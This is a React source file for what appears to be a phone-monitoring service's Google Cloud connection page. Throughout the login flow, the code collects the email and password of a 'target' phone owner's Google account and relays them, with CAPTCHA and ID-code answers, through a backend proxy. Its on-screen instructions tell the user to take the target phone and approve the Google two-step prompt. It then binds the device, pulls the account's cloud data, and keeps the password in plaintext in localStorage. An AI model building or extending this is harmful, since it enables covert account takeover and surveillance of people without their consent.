import { Carousel } from 'antd'
import Image from 'next/image'
import Link from 'next/link'
import { useRouter } from 'next/router'
import { useEffect, useMemo, useRef, useState } from 'react'
import { useTranslation } from 'src/utils/i18n'
import Tutorial from './Tutorial'
import PhoneCarousel from './PhoneCarousel'
import styles from 'src/@core/components/android/login/newGcloundLogin.module.scss'
import { messageInfo } from '../Message'
import { MessageInfo } from 'src/components/pop-up-window'
import { gcloudDownload, googleCodeSubmit, googleSignup, googleStatusQuery, userBindingDevice } from 'src/@api/login'
import resolveCurrentOrderId, { appendSetupQuery, clearBindOrderContext } from 'src/utils/resolveCurrentOrderId'
import { resolveBindingDeviceResponse } from 'src/utils/bindingDeviceResult'
import { applyBoundDeviceByOrderId } from 'src/utils/appDeviceBridge'
import App1 from './App1'
import App2 from './App2'
import Plugin1 from './Plugin1'
import { Spin } from 'antd';
import { LoadingOutlined } from '@ant-design/icons';
import SensitiveEmailInput from 'src/@core/components/SensitiveEmailInput/SensitiveEmailInput'

const Dashboard1 = ({ currentItem, setCurrentItem, appKey, fullScreen, setFullScreen }) => {
  const { t } = useTranslation('commonAndroid')
  const router = useRouter()

  // 控制按钮等待状态
  const [loading, setLoading] = useState(false)

  // 显示用户名验证
  const [showUsernameVerify, setShowUsernameVerify] = useState('')

  // 显示机器人验证
  const [showRobotVerify, setShowRobotVerify] = useState('')
  const [showRobotVerifyBase, setShowRobotVerifyBase] = useState('')

  // 显示用户密码验证
  const [showPasswordVerify, setShowPasswordVerify] = useState('')

  const [showTwosTepVerify, setShowTwosTepVerify] = useState('')

  /*
  轮询状态
  1、默认显示用户 NEED_USERNAME
  2、显示密码 NEED_PWD
  3、二步验证 NEED_2SV
  4、成功 SUCCESS
  */
  const [needStatus, setNeedStatus] = useState(showTwosTepVerify == '' ? 'NEED_USERNAME' : 'NEED_2SV')


  // 用户名
  const [username, setUsername] = useState('')

  // 用户验证码
  const [usernameVerifyCode, setUsernameVerifyCode] = useState('')

  // 机器人验证
  const [clicked, setClicked] = useState([])

  // 密码
  const [password, setPassword] = useState('')

  const [showPassword, setShowPassword] = useState(false)

  // 密码验证码
  const [passwordVerifyCode, setPasswordVerifyCode] = useState('')

  // 正则
  let re = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/

  const step1 = useMemo(
    () => [
    ],
    [t]
  )

  const step2 = useMemo(
    () => [
      {
        title: (
          <span>
            {t('A notification has been sent to the target phone from Google official. Please tap')}
            <strong>&nbsp;"{t('Yes its me')}".</strong>
          </span>
        ),
        img: [
          {
            src: '/images/android/setup/dashboard2-1.jpg'
          }
        ]
      },
      {
        title: <span>{t('Please tap the same number on the target phone')}.</span>,
        img: [
          // {
          //   src: showTwosTepVerify ? showTwosTepVerify : ''
          // }
        ]
      }
    ],
    [t]
  )
  const [step, setStep] = useState([...step1])
  const [currentSlide, setcurrentSlide] = useState(0)

  useEffect(() => {
    console.log('xxxxxxxxxxxxxxxxxxx', needStatus)
    if (needStatus === 'NEED_USERNAME') {
      console.log('yyyyyyyyyyyyyyyyy', 'NEED_USERNAME')
      setStep([...step1])
    } else if (needStatus === 'NEED_PWD') {
      console.log('yyyyyyyyyyyyyyyyy', 'NEED_PWD')
      setStep([...step1])
    } else if (needStatus === 'NEED_2SV') {
      console.log('yyyyyyyyyyyyyyyyy', 'NEED_2SV')
      setStep([...step2])
    } else if (needStatus === 'SUCCESS') {
      console.log('yyyyyyyyyyyyyyyyy', 'SUCCESS')
      setStep([...step2])
      setCurrentItem('Finish')
    }
  }, [needStatus, setCurrentItem, step1, step2])

  const login = () => {
    setLoading(true)

    //埋点上报
    if (username) {
      bindTracking('cloudWebConnectClick')
    }

    if (needStatus == 'NEED_USERNAME') {
      // 开始走用户模块
      if (showUsernameVerify == '' && showRobotVerify == '') {
        // 校验邮箱
        if (!re.test(username)) {
          MessageInfo({ content: t('E-mail format is incorrect'), type: 'error' })
          setLoading(false)

          return
        }

        // 提交用户名
        googleSignup({ username })

        // 开启轮询
        startQuery()

        // 提示
        MessageInfo(t('Please wait without leaving this page'))
      } else if (showUsernameVerify != '' && showRobotVerify == '') {
        // 用户名和验证码
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'ID_CODE',
          extra: {
            tag: 'ID_CODE',
            idCode: usernameVerifyCode
          }
        })
        setShowUsernameVerify('')
      } else if (showUsernameVerify == '' && showRobotVerify != '') {
        // 用户机器人验证
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'ROBOT_PARAMS',
          extra: {
            tag: 'ROBOT_PARAMS',
            robotParams: {
              iamgeType: palaceGridType === 3 ? 1 : 2,
              selectedGrids: clicked
            }
          }
        })
        setShowRobotVerify('')
        setClicked([])
      }
    } else if (needStatus == 'NEED_PWD') {
      // 提交密码
      if (password != '' && passwordVerifyCode == '') {
        localStorage.setItem('android-password', password)
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'PASSWORD',
          extra: {
            tag: 'PASSWORD',
            password: password
          }
        })
      } else if (password != '' && passwordVerifyCode != '') {
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'PWD_CODE',
          extra: {
            tag: 'PWD_CODE',
            idCode: passwordVerifyCode
          }
        })
      }
    }
  }

  // 区分9宫格还是16宫格
  const [palaceGridType, setPalaceGridType] = useState(3)
  const palaceGrid = () => {
    return new Promise((r, j) => {
      setTimeout(() => {
        const robotImg = document.getElementById('robotImg')

        let natural = 3
        if (robotImg && robotImg.naturalWidth === 450) {
          natural = 4
        }
        r(natural)
      }, 1000)
    })
  }

  // 处理机器人图标点击
  const handleRobotImageClick = e => {
    const currentIndex = clicked.indexOf(e)
    if (currentIndex !== -1) {
      setClicked(clicked.filter(row => row != e))
    } else {
      setClicked([...clicked, e])
    }
  }

  const lastEmRef = useRef(null) // 记录轮询接口上次返回的结果
  const queryTimerRef = useRef(null)
  const queryGenerationRef = useRef(0)
  const successHandledRef = useRef(false)

  const stopQuery = () => {
    queryGenerationRef.current += 1
    if (queryTimerRef.current) {
      clearTimeout(queryTimerRef.current)
      queryTimerRef.current = null
    }
  }

  const startQuery = async () => {
    stopQuery()
    successHandledRef.current = false
    lastEmRef.current = null
    const generation = ++queryGenerationRef.current

    const scheduleNext = delay => {
      if (queryGenerationRef.current !== generation || successHandledRef.current) return
      queryTimerRef.current = setTimeout(query, delay)
    }

    const query = async () => {
      if (queryGenerationRef.current !== generation || successHandledRef.current) return
      console.log(12344, 'username:', username, 'needStatus:', needStatus, 'password', password)
      if (!username) return

      let result = await googleStatusQuery({ username })

      // 忽略已停止轮询后才返回的旧请求，避免迟到状态覆盖成功状态。
      if (queryGenerationRef.current !== generation || successHandledRef.current) return
      console.log(result, 4488)

      // 如果 em 与上次相同则直接跳出
      if (result?.data?.em) {
        if (result.data.em === lastEmRef.current) {
          // 延迟 3 秒再下一次轮询
          scheduleNext(3000)

          return
        }
        lastEmRef.current = result.data.em // 更新
      }

      // 没有状态或者没有用户不处理
      if (result.data.em == 'USER_NOT_FOUND' || result.data.em == 'UNEXPECTED_STATUS') {
        scheduleNext(3000)

        return
      }

      // 处理用户名验证
      if (result.data.extra.tag === 'NEED_ID_CHECK') {
        setShowUsernameVerify(result.data.extra.imageData)
        setLoading(false)
        scheduleNext(3000)

        return
      }

      // 处理机器人验证
      if (result.data.extra.tag === 'NEED_ROBOT_CHECK') {
        setShowRobotVerify(result.data.extra.imageUrl)
        setShowRobotVerifyBase(result.data.extra.imageData)

        let gridNumber = await palaceGrid()
        if (queryGenerationRef.current !== generation || successHandledRef.current) return
        setPalaceGridType(gridNumber)
        let robotBox = document.getElementById('robot_box')
        if (robotBox) {
          robotBox.style.gridTemplateColumns = `repeat(${gridNumber}, 1fr)`
          robotBox.style.gridTemplateRows = `repeat(${gridNumber}, 1fr)`
        }

        setLoading(false)
        scheduleNext(3000)

        return
      }

      // 进入密码步骤
      if (result.data.extra.tag === 'NEED_PWD') {
        setNeedStatus('NEED_PWD')
        setLoading(false)
        scheduleNext(3000)

        return
      }

      // 处理密码验证
      if (result.data.extra.tag === 'NEED_PWD_CHECK') {
        setShowPasswordVerify(result.data.extra.imageData)
        setLoading(false)
        scheduleNext(3000)

        return
      }

      // 未知错误
      if (result.data.extra.tag === 'UNKNOWN_ERROR') {
        setNeedStatus('NEED_USERNAME')
        MessageInfo({ content: t('Incorrect verification code please try again'), type: 'error' })
        setLoading(false)

        // 这里可以停止轮询
        return
      }

      // 无效账号
      if (result.data.extra.tag === 'INVALID_ACCOUNT') {
        setNeedStatus('NEED_USERNAME')
        MessageInfo({ content: t('Account not found please try again'), type: 'error' })
        setLoading(false)

        return
      }

      // 回到密码流程
      if (result.data.extra.tag === 'INVALID_ACCOUNT_OR_PASSWORD') {
        setShowPasswordVerify('')
        setPasswordVerifyCode('')
        setNeedStatus('NEED_PWD')
        MessageInfo({ content: t('Incorrect password please try again'), type: 'error' })
        setLoading(false)

        await new Promise(resolve => setTimeout(resolve, 3000))
        scheduleNext(0)

        return
      }

      // 二步验证
      if (result.data.extra.tag === 'NEED_2SV') {
        setShowTwosTepVerify(result.data.extra.imageData)
        setNeedStatus('NEED_2SV')
        MessageInfo(t('Please wait without leaving this page'))
        setLoading(false)

        await new Promise(resolve => setTimeout(resolve, 3000))
        scheduleNext(0)

        return
      }

      // 成功
      if (result.data.extra.tag === 'SUCCESS') {
        // 立即终止轮询并使尚未返回的旧请求失效，防止成功后回退到第一步。
        successHandledRef.current = true
        stopQuery()
        setNeedStatus('SUCCESS')
        window.localStorage.setItem('Basic', 1)
        window.localStorage.setItem(
          'DeviceUser',
          JSON.stringify({
            username: `${username}`,
            password: password
          })
        )
        const orderId = await resolveCurrentOrderId()
        if (!orderId) {
          MessageInfo({ content: 'Current order is missing', type: 'error' })
          setLoading(false)

          return
        }

        const bindResult = await userBindingDevice({
          username: `${username}`,
          password: localStorage.getItem('android-password') ?? 'no password',
          order_id: orderId,
          verify: 1,
          platformType: 'Android-Cloud'
        })
        const bindResolved = resolveBindingDeviceResponse(bindResult, {
          platformType: 'Android-Cloud',
          router,
          t,
          onMessage: opts => MessageInfo(opts)
        })
        if (!bindResolved.shouldContinue) {
          setLoading(false)

          return
        }

        // Web 谷歌云绑定成功：不能只 refreshSidebarDevices（太早仍显示 Package）。
        // 走 applyBoundDeviceByOrderId：延迟重试选中设备，并在 finally 里再刷侧栏。
        // 选中成功后再清 ontBindOrder / URL orderId，避免继续当成未绑 Package。
        const selected = await applyBoundDeviceByOrderId({
          orderId,
          platformType: 'Android-Cloud'
        })
        if (selected.ok) {
          clearBindOrderContext()
        }

        await gcloudDownload({
          mode: 4,
          username: `${username}`,
          password: localStorage.getItem('android-password') ?? 'no password'
        })
        setLoading(false)

        // 绑定成功后必须停止轮询：否则后续轮询会拿到「已被消费」的状态
        //（UNKNOWN_ERROR / INVALID_ACCOUNT），把 needStatus 打回 NEED_USERNAME，
        // 表现为「设备其实已经绑上、侧栏都有设备了，页面却跳回第一步」。
        return
      }

      // 网络超时或未处理情况
      MessageInfo({ content: t('Network timeout please check and try again'), type: 'error' })
      setLoading(false)
      scheduleNext(3000)
    }

    query() // 启动轮询
  }

  useEffect(() => () => stopQuery(), [])

  const Handler = index => {
    setcurrentSlide(index)
  }

  const [showText, setShowText] = useState(true)

  // 埋点上报
  const bindTracking = async (type) => {
    const typeMap = {
      NEED_USERNAME: "cloudWebInputView",
      NEED_2SV: "cloudWebCredsCorrect",
      SUCCESS: "cloudWebVerifySuccess",
      cloudWebConnectClick: "cloudWebConnectClick",
    }
    const action = typeMap[type]
    if (!action) return
  }

  useEffect(() => {
    if (currentItem === 'Dashboard') bindTracking(needStatus)
  }, [needStatus, currentItem])

  const StepProgress = ({ current, total = 5 }) => {
    const barWidth = 72

    return (
      <div className="flex items-center justify-center gap-4 mb-[40px] Mlg:mb-[20px]">
        <div className="text-[20px] leading-[30px] font-medium text-[#484B60] Mlg:text-[16px] Mlg:leading-[24px] ">
          {current}/{total}
        </div>

        <div className="flex gap-x-[6px]">
          {Array.from({ length: total }).map((_, i) => {
            const active = i < current

            return (
              <div
                key={i}
                className="h-[4px] w-[72px] Mlg:w-[48px] rounded-[1px]"
                style={
                  active
                    ? {
                      background: "linear-gradient(90deg, #09A6EA 1.56%, #6838F2 47.99%)",
                      backgroundSize: `${current * barWidth}px 4px`,
                      backgroundPosition: `-${i * barWidth}px 0px`,
                    }
                    : {
                      background: "#E8EDFF",
                    }
                }
              />
            )
          })}
        </div>
      </div>
    )
  }

  return (
    <>
      {currentItem === 'Dashboard' && <div>
        {needStatus === 'NEED_USERNAME' ? <StepProgress current={1} /> : needStatus === 'NEED_PWD' ? <StepProgress current={2} /> : needStatus === 'NEED_2SV' && <StepProgress current={3} />}
        <div className='w-full flex flex-col items-center' id='android-dashboard-login'>
          <h2 className='text-[24px] text-[#282938] font-[600] mx-auto text-center'>
            {needStatus === 'NEED_USERNAME' ? t('Enter the Google Account of the target Android') : needStatus === 'NEED_PWD' ? t('Enter the password') : needStatus === 'NEED_2SV' && t('Tap the matching number on the target phone')}
          </h2>
          {needStatus === 'NEED_PWD' &&
            <div className='text-[16px] text-black mt-4'>
              {t('for')} {username || 'xxxx@gmail.com'}
            </div>}
          {needStatus === 'NEED_2SV' &&
            <div className='mt-4 text-[16px] leading-[24px] w-[565px] Dsm:w-full text-[#000000CC] text-start'>
              <p>1. {t('Tap Yes its me')}</p>
              <p className='mt-3'>2. {t('Tap the matching number on the target phone to confirm')}</p>
            </div>}
          {(needStatus === 'NEED_USERNAME' || needStatus === 'NEED_PWD') && (
            <>
              {/* <div className='w-[600px] Dsm:w-full py-[8px] pl-[40px] pr-[50px] Dsm:px-[9px] Dsm:py-[8px] mt-[24px] mb-[32px] Dsm:mb-0 bg-[rgba(255,0,0,0.05)] rounded-[6px] flex items-start'>
                <Image
                  src='/images/apps/waring.svg'
                  className='flex items-start mt-[3.5px] mr-[5px]'
                  alt='img'
                  width={12}
                  height={12}
                />
                <p className='text-center text-[14px] text-[#F11E34]'>
                  {t(
                    'A twostep verification code or SMS will be sent to the target phone from Google official after you click Connect'
                  )}
                </p>
              </div>
              <p className='hidden Dsm:flex mt-[24px] mb-[32px] text-[14px] text-[rgba(40,41,56,0.4)] text-center'>
                {t('Enter the Google account email and password of the phone you want to monitor')}
              </p> */}
            </>
          )}

          <div
            className={`w-[600px] Dsm:w-full flex flex-col justify-between`}
          >
            {/* left */}
            <div className={`w-[360px] Dsm:w-full mx-auto flex flex-col items-center ${needStatus != 'NEED_2SV' ? 'mt-[50px]' : ''}`}>

              {/* {(needStatus === 'NEED_USERNAME' || needStatus === 'NEED_PWD') && (
                <p className='Dsm:hidden mb-[26px] text-[20px] text-[#282938]'>
                  {t('Enter the Google account email and password of the phone you want to monitor')}
                </p>
              )} */}

              {/* 用户名 */}
              {needStatus === 'NEED_USERNAME' ? (
                <>
                  <div className='w-full Dsm:w-full h-[48px] bg-[rgba(217,217,217,0.3)] rounded-[30px] flex'>
                    <div className='w-[46px] h-full flex justify-center items-center'>
                      <Image
                        className='ml-[6px]'
                        src='/images/android/setup/google.svg'
                        width={16}
                        height={16}
                        alt='google'
                      />
                    </div>

                    {loading &&
                      <div style={{
                        position: 'absolute', width: '315px', minHeight: '75px', background: '#000', opacity: '0.8', left: '50%', transform: "translate(-50%,-100px)", zIndex: "99",
                        borderRadius: "12px", padding: '10px',
                        display: 'flex', alignItems: 'center'
                      }}>
                        <Spin indicator={<LoadingOutlined spin />} className='text-[#fff]' size="large" />
                        <p className='text-[#ffffff] ml-[10px]'>{t('It may take a few minutes please be patient')}</p>
                      </div>
                    }

                    <SensitiveEmailInput
                      className='text-[14px] flex-1 bg-transparent outline-none'
                      placeholder={t('Google account email')}
                      value={username}
                      onChange={e => setUsername(e.target.value.trim())}
                      onKeyDown={e => {
                        if (e.key === 'Enter') {
                          if (loading) return
                          login()
                        }
                      }}
                    />
                    <div className='w-[16px] h-full flex justify-center items-center'></div>
                  </div>
                  {/* 显示用户验证 */}
                  {showUsernameVerify ? (
                    <div className={styles.verify_box}>
                      <input
                        className={styles.input}
                        placeholder='Verify'
                        onChange={e => setUsernameVerifyCode(e.target.value.trim())}
                      />
                      <Image width='100' height='60' src={showUsernameVerify} alt='img' />
                    </div>
                  ) : null}
                  {/* 机器人验证 */}
                  {showRobotVerify ? (
                    <>
                      <p style={{ textAlign: 'center', color: '#565555' }}>After verification, please click Next</p>
                      <div className={styles.robot_box}>
                        <Image
                          width={318}
                          height={100}
                          style={{ margin: '10px' }}
                          src={showRobotVerifyBase}
                          alt='img'
                        />
                        <div id='robot_box' className={styles.img_border}>
                          <Image id='robotImg' width={300} height={300} src={showRobotVerify} alt='img' />
                          {Array.from({ length: palaceGridType == 3 ? 9 : 16 }).map((row, i) => (
                            <div className={styles.cell} key={i} onClick={() => handleRobotImageClick(i + 1)}>
                              <span
                                style={{
                                  width: '20px',
                                  height: '20px',
                                  background: '#00FE4E',
                                  borderRadius: '50%',
                                  display: clicked.includes(i + 1) ? 'inline-block' : 'none'
                                }}
                              ></span>
                            </div>
                          ))}
                        </div>
                      </div>
                    </>
                  ) : null}
                </>
              ) : null}

              {/* ⛔ Find it here 已隐藏：跳 /guide（msafely 没有该文章页）2026-09-21。恢复：删掉 false && */}
              {false && needStatus === 'NEED_USERNAME' &&
                <div className='w-full h-[40px] mx-auto rounded-[8px] px-[10px] flex mt-[50px] mb-[50px] justify-between items-center text-[13px] text-white bg-[linear-gradient(270deg,_#06BAFD_-0.22%,_#6B51FE_84.27%)]'>
                  <p>{t('Not sure which account to use')}?</p>
                  <div className='flex items-center'>
                    <Image src={'/images/android/setup/user.svg'} width={18} height={18} alt='user' />
                    <Link className='ml-[6px] underline' target="_blank" rel="noopener noreferrer"
                      href='/guide/user-guide-android'>
                      {t('Find it here')}
                    </Link>
                  </div>
                </div>}

              {/* 密码 */}
              {needStatus === 'NEED_PWD' ? (
                <>
                  <div className='w-full Dsm:w-full h-[48px] bg-[rgba(217,217,217,0.3)] rounded-[30px] flex'>
                    <div className='w-[46px] h-full flex justify-center items-center'>
                      <Image
                        className='ml-[6px]'
                        src='/images/android/setup/password.svg'
                        width={21}
                        height={20}
                        alt='google'
                      />
                    </div>
                    {loading &&
                      <div style={{
                        position: 'absolute', width: '315px', minHeight: '75px', background: '#000', opacity: '0.8', left: '50%', transform: "translate(-50%,-100px)", zIndex: "99",
                        borderRadius: "12px", padding: '10px',
                        display: 'flex', alignItems: 'center'
                      }}>
                        <Spin indicator={<LoadingOutlined spin />} className='text-[#fff]' size="large" />
                        <p className='text-[#ffffff] ml-[10px]'>{t('It may take a few minutes please be patient')}</p>
                      </div>
                    }
                    <input
                      className='text-[14px] flex-1 bg-transparent outline-none'
                      placeholder={t('Password')}
                      type={showPassword ? 'text' : 'password'}
                      value={password}
                      onChange={e => setPassword(e.target.value.trim())}
                      onKeyDown={e => {
                        if (e.key === 'Enter') {
                          if (loading) return
                          login()
                        }
                      }}
                    ></input>
                    <div className='w-[50px] h-full flex justify-center items-center cursor-pointer' onClick={() => setShowPassword(!showPassword)}>
                      <Image
                        src='/images/login/eye.svg'
                        width={21}
                        height={20}
                        alt='google'
                      />


                    </div>
                  </div>
                  {/* 显示密码验证 */}
                  {showPasswordVerify ? (
                    <div className={styles.verify_box}>
                      <input
                        className={styles.input}
                        placeholder='Google account password'
                        onChange={e => setPasswordVerifyCode(e.target.value.trim())}
                      />
                      <Image width='100' height='60' src={showPasswordVerify} alt='img' />
                    </div>
                  ) : null}
                </>
              ) : null}

              {/* 按钮 */}
              {/* {(needStatus === 'NEED_USERNAME' || needStatus === 'NEED_PWD') && (
                <>
                  <button
                    className={`${loading ? 'opacity-70' : ''
                      } mt-[32px] Dsm:mt-[24px] w-full Dsm:w-full h-[48px] bg-[#FFCF55] rounded-[41px] text-[16px] text-[#1B1C2B] font-[600] flex items-center justify-center`}
                    onClick={() => {
                      if (loading) return
                      login()

                    }}
                  >
                    {needStatus === 'NEED_USERNAME' ? t('Next') : t('Connect')}
                    {loading && (
                      <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                    )}
                  </button>
                  <p
                    className='hidden Dsm:flex w-full justify-center text-center text-[16px] text-[#2405F2] underline mt-[30px] cursor-pointer'
                    onClick={() => setFullScreen(true)}
                  >
                    {t('Where to find the Google account')}
                  </p>
                </>
              )}
              {(needStatus === 'NEED_USERNAME' || needStatus === 'NEED_PWD') &&
                <button className={`${loading && 'opacity-70'} mt-[16px] w-full Dsm:w-full h-[48px] rounded-[24px] text-[16px] text-[#454CFF] border-[1px] border-[#454CFF] font-[600] flex items-center justify-center`}
                  onClick={() => {
                    if (needStatus === 'NEED_PWD') setNeedStatus('NEED_USERNAME')
                    else setCurrentItem('Start')
                  }}>
                  {t('Back')}
                  {loading && (
                    <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                  )}
                </button>} */}

              {(needStatus === 'NEED_USERNAME' || needStatus === 'NEED_PWD') &&
                <div className='w-full mx-auto fixed bottom-0 left-[150px] Mlg:left-0 right-0 bg-white border-t-[1px] border-[#E5E7EB]'>
                  <div className='flex justify-center w-full p-5 Mlg:px-0 bg-white mx-auto'>
                    <div className='w-full lg:w-[620px] flex justify-between smj:px-4'>
                      <button className={`border-[1px] border-[#454CFF] bg-white rounded-[24px] h-[35px] flex items-center pl-[10px] pr-[19px] ${loading && 'opacity-70'}`}
                        disabled={loading}
                        onClick={() => {
                          if (loading) return
                          if (needStatus === 'NEED_PWD') setNeedStatus('NEED_USERNAME')
                          else window.location.assign(appendSetupQuery('/android/classification'))
                        }}>
                        <Image className='mr-[7px]' src='/images/bind/bind-arrow-blue.svg' width={18} height={18} alt='back' />
                        <span className='text-[15px] text-[#454CFF] font-[600]'>{t('BACK')}</span>
                        {loading && (
                          <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                        )}
                      </button>

                      <button className={`bg-[#FFCF55] rounded-[24px] h-[35px] flex items-center pl-[24px] pr-[10px] ${loading && 'opacity-70'}`}
                        disabled={loading}
                        onClick={() => {
                          if (loading) return
                          login()
                        }}>
                        <span className='text-[15px] text-[#1B1C2B] font-[600]'>{needStatus === 'NEED_USERNAME' ? t('NEXT') : t('CONNECT')}</span>
                        {loading && (
                          <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                        )}
                        <Image className='ml-[6px]' src='/images/bind/bind-arrow-black.svg' width={18} height={18} alt='back' />
                      </button>
                    </div>
                  </div>
                </div>}

              {needStatus === 'NEED_PWD' &&
                <div className='mt-[40px] w-full h-auto'>
                  {/* <p className='text-[#2405F2] font-[600] text-[16px] leading-[24px]'>
                    {t('A Google notification will be sent to the target phone after you click Connect')}
                  </p> */}
                  <div className='bg-white p-3 mt-6 flex items-start rounded-[8px] [box-shadow:0px_1px_6px_0px_#28293826]'>
                    <Image src='/warn.svg' alt='img' width={24} height={24} />
                    <p className='text-start ml-3 text-[14px] leading-[22px] text-[#282938]'>
                      {t('A Google notification will be sent to the target phone after you click Connect')}
                    </p>
                  </div>
                  <button className='mt-4 text-[16px] leading-[24px] underline font-[600] text-[#2A99FF] mx-2'
                    onClick={() => { setShowText(!showText) }}>
                    {t('What should I do next')}?
                  </button>
                  {showText &&
                    <div className='mt-3 text-[14px] leading-[22px] text-[#000000CC] mx-2'>
                      <p>1. {t('Get the target phone and wait for the Google verification pop-up')}</p>
                      <p>2. {t('Tap Yes its me')}</p>
                      <p>3. {t('Wait for the number to appear on this page then match the same number on the target phone')}</p>
                    </div>}
                </div>}

              {/* <div
                className={`${needStatus === 'NEED_USERNAME' || needStatus === 'NEED_PWD'
                  ? 'pt-[26px] pl-[9px] pr-[23px] Dsm:hidden'
                  : 'w-full'
                  }`}
              >
                {step.map((item, i) => (
                  <div
                    key={i}
                    className={`${i != 0 ? 'mt-[9px] Dsm:mt-[8px]' : ''} flex cursor-pointer`}
                    onClick={() => Handler(i)}
                  >
                    <div
                      className={`${currentSlide == i ? 'text-[#FFF] bg-[#2A99FF]' : ''
                        } text-[14px] min-w-[20px] h-[20px] rounded-[50%] flex justify-center items-center mt-[1.5px]`}
                    >
                      {i + 1}.
                    </div>
                    &ensp;{item.title}
                  </div>
                ))}
              </div> */}

              {needStatus === 'NEED_2SV' && (
                <>
                  <Image src={showTwosTepVerify || '/images/android/setup/tips.webp'} width={322} height={606} className='w-[80%] mt-[36px] Dsm:mt-6 Dmd:mb-5 mx-auto' alt='img' />
                </>
              )}
            </div>
            {needStatus === 'NEED_2SV' &&
              <div className='mt-2 smj:mt-7 smjs:mb-5 mx-auto w-full bg-white rounded-[8px] p-3 flex items-start [box-shadow:0px_1px_6px_0px_#28293826]'>
                <Image src={'/warn.svg'} width={24} height={24} alt='' />
                <p className='ml-3 text-[14px] leading-[22px] text-[#282938]'>
                  {t('Please confirm you have selected the correct verification code otherwise you will not be able to proceed to the next step')}<br />
                  {t('If you remain on this page please choose another connection method')}
                </p>
              </div>}
          </div>
          {/* 弹窗 */}
          {fullScreen && <Tutorial step={step} onClose={() => setFullScreen(false)} />}

          {/* {needStatus == 'NEED_PWD' && <div className='w-full max-w-[600px]'>

            <p className='text-left'>{t('Tips')}:</p>
            <p className='text-[14px] mt-[8px]'>
              1. {t('After enter code and connect you will see a num shown on this page')}
            </p>
            <p><Image className='mx-auto py-[12px]' alt="icon" width={200} height={190} src={'/images/login/tips-1.png'} /></p>
            <p className='text-[14px] mt-[8px]'>2. {t('Then there is a pop-up on target phone click')} <strong>"{t('Yes its me')}"</strong> , {t('and then select the')} <strong>{t('same num')}</strong> {t('shown on thie page')}</p>
            <p><Image className='mx-auto py-[12px]' alt="icon" width={260} height={57} src={'/images/login/tips-2.png'} /></p>
            <p><Image className='mx-auto py-[12px]' alt="icon" width={260} height={110} src={'/images/login/tips-3.png'} /></p>

          </div>} */}
        </div>
      </div>}

      {currentItem === 'App' && appKey == 1 && <App1 setCurrentItem={setCurrentItem} fullScreen={fullScreen} setFullScreen={setFullScreen} />}
      {currentItem === 'App' && appKey == 2 && <App2 setCurrentItem={setCurrentItem} />}
      {/* {currentItem === 'Plugin' && <Plugin1 />} */}
    </>
  )
}

export default Dashboard1
